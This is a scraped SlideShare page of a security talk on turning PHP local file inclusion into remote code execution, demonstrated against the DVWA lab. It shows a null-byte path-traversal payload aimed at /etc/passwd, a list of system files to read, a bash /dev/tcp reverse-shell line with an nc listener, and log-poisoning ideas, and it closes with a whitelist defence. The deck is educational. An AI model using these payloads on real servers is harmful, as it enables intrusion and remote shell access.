Local File Inclusion to Remote Code Execution
6 likes11,390 views
This document discusses local file inclusion (LFI) vulnerabilities that can allow attackers to execute remote code. It explains how LFI works by dynamically including user-supplied files, and how attackers can use path traversal and null bytes to read arbitrary local files. It then describes how attackers can use LFI to execute reverse shells on the target server by including a PHP script that opens a remote connection. The document provides examples of vulnerable PHP functions and common files that can be read. It concludes by recommending input validation and whitelisting of allowed files to defend against LFI attacks.
![Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni](https://image.slidesharecdn.com/lfitorce-140407115128-phpapp02/85/Local-File-Inclusion-to-Remote-Code-Execution-1-320.jpg)
![How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
The code would be:
<?php $file =$_GET[‘file'];
include("/".$file .".php"); <--Vulnerable !!
?>
Assign page to "../../../../etc/passwd%00“
<?php $file =$_GET[‘file'];
include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?>
%00 (Null CHAR) will ignore everything that comes after %00
../../../ will traverse path to root and goto /etc/passwd](https://image.slidesharecdn.com/lfitorce-140407115128-phpapp02/85/Local-File-Inclusion-to-Remote-Code-Execution-4-320.jpg)
![Defending yourself
<?php
$page_files=array( 'about'=>'about.html',
'photos'=>'photos.html',
'contact'=>'contact.html',
'home'=>'home.html'
);
if (in_array($_GET['page'],array_keys($page_files))) {
include $page_files[$_GET['page']];
} else {
include $page_files['home'];
}
?>](https://image.slidesharecdn.com/lfitorce-140407115128-phpapp02/85/Local-File-Inclusion-to-Remote-Code-Execution-11-320.jpg)
Local File Inclusion to Remote Code Execution
- 1. Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
- 2. Introduction What is a file inclusion vulnerability? How the attack works? RFI/LFI vulnerable PHP functions Traverse and read local files PathTraversal / FI using scanners Reverse shell via LFI Other ways to inject your code Defending yourself
- 3. What is a file inclusion vulnerability? Input validation The application trusts/doesn’t validate the user input The code includes/imports other pages Dynamic including of the page When PHP includes a file it will parse any PHP code within that file (“<?php” and “?>”) Do not trust the user…ever !!
- 4. How the attack works? http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include The code would be: <?php $file =$_GET[‘file']; include("/".$file .".php"); <--Vulnerable !! ?> Assign page to "../../../../etc/passwd%00“ <?php $file =$_GET[‘file']; include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?> %00 (Null CHAR) will ignore everything that comes after %00 ../../../ will traverse path to root and goto /etc/passwd
- 5. RFI/LFI vulnerable PHP functions include() include_once() require() require_once() fopen()
- 6. Common locations Normally, the following files are read: /etc/passwd /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/httpd/conf/httpd.conf Other Unix common locations
- 7. Path Traversal / FI using scanners http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
- 8. We read the files, what next?
- 9. Reverse shell via LFI PHP script to open an outbound TCP connection <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?> Go and catch the reverse shell nc –lp <port>
- 10. Other ways to inject your code Using directory traversal to read files Log poisoning (access.log, error.log) Session variables Uploaded files Emails Shared hosting FTP and other logs
- 11. Defending yourself <?php $page_files=array( 'about'=>'about.html', 'photos'=>'photos.html', 'contact'=>'contact.html', 'home'=>'home.html' ); if (in_array($_GET['page'],array_keys($page_files))) { include $page_files[$_GET['page']]; } else { include $page_files['home']; } ?>
- 12. Thank You!